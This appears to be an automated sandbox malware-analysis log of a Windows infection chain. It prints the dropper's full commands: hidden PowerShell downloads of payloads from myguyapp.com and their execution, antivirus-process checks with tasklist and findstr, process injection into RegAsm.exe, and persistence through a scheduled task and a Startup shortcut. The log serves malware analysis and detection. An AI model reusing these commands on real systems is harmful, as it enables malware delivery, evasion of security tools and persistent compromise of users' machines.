Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Memory allocated: C40000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Memory allocated: 2870000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Memory allocated: 27B0000 memory reserve | memory write watch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3545
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4825
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5348
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 586
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6164
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3405
Source: C:\Windows\SysWOW64\timeout.exe Window / User API: threadDelayed 743
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Window / User API: threadDelayed 5043
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Window / User API: threadDelayed 884
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Window / User API: threadDelayed 8918
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif API coverage: 6.3 %
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr API coverage: 4.5 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7176 Thread sleep count: 3545 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7172 Thread sleep count: 4825 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208 Thread sleep time: -13835058055282155s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7232 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7040 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7240 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7476 Thread sleep count: 5348 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7488 Thread sleep count: 586 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7568 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7940 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7460 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8020 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4456 Thread sleep count: 6164 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4080 Thread sleep count: 3405 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7360 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 4088 Thread sleep count: 743 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 4088 Thread sleep time: -74300s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif TID: 7236 Thread sleep time: -50430s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 5700 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 6228 Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 6228 Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 6304 Thread sleep count: 884 > 30
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 6304 Thread sleep count: 8918 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Thread sleep count: Count: 5043 delay: -10
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Code function: 15_2_004062D5 FindFirstFileW,FindClose,15_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Code function: 15_2_00402E18 FindFirstFileW,15_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Code function: 15_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,15_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 28_2_01044005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,28_2_01044005
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 28_2_0104494A GetFileAttributesW,FindFirstFileW,FindClose,28_2_0104494A
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 28_2_01043CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,28_2_01043CE2
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 28_2_0104C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,28_2_0104C2FF
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 28_2_0104CD14 FindFirstFileW,FindClose,28_2_0104CD14
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 28_2_0104CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,28_2_0104CD9F
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 28_2_0104F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,28_2_0104F5D8
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 28_2_0104F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,28_2_0104F735
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 28_2_0104FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,28_2_0104FA36
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Code function: 36_2_00894005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,36_2_00894005
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Code function: 36_2_0089C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,36_2_0089C2FF
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Code function: 36_2_0089494A GetFileAttributesW,FindFirstFileW,FindClose,36_2_0089494A
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Code function: 36_2_0089CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,36_2_0089CD9F
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Code function: 36_2_0089CD14 FindFirstFileW,FindClose,36_2_0089CD14
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Code function: 36_2_0089F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,36_2_0089F5D8
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Code function: 36_2_0089F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,36_2_0089F735
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Code function: 36_2_0089FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,36_2_0089FA36
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Code function: 36_2_00893CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,36_2_00893CE2
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 28_2_00FF5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,28_2_00FF5D13
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\msword
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\msword\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: mshta.exe, 00000000.00000002.2191819008.000000000A6C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 00000000.00000003.2180407908.000000000A6C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2191819008.000000000A6C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000000.00000002.2191819008.000000000A689000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2178648980.000000000A686000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@Dl
Source: RegAsm.exe, 00000028.00000002.4142044815.0000000000A89000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^
Source: Carter.pif, 0000001C.00000002.4146223730.0000000003C30000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif API call chain: ExitProcess graph end node graph_28-100560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 28_2_010545D5 BlockInput,28_2_010545D5
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 28_2_00FF5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,28_2_00FF5240
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 28_2_01015CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,28_2_01015CAC
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe Code function: 15_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,15_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 28_2_010388CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,28_2_010388CD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 28_2_0100A354 SetUnhandledExceptionFilter,28_2_0100A354
Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Code function: 28_2_0100A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0100A385
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Code function: 36_2_0085A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_0085A385
Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr Code function: 36_2_0085A354 SetUnhandledExceptionFilter,36_2_0085A354
Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifMemory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: 5C0000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifMemory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: 5C0000
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifMemory written: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe base: 626000
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01039369 LogonUserW,28_2_01039369
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_00FF5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,28_2_00FF5240
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01041AC6 SendInput,keybd_event,28_2_01041AC6
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_010451E2 mouse_event,28_2_010451E2
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 90
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & echo url="c:\users\user\appdata\local\cloudsynergy solutions\danielpulse.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & exit
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & echo url="c:\users\user\appdata\local\cloudsynergy solutions\danielpulse.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\danielpulse.url" & exit
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_010388CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,28_2_010388CD
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 28_2_01044F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,28_2_01044F1C
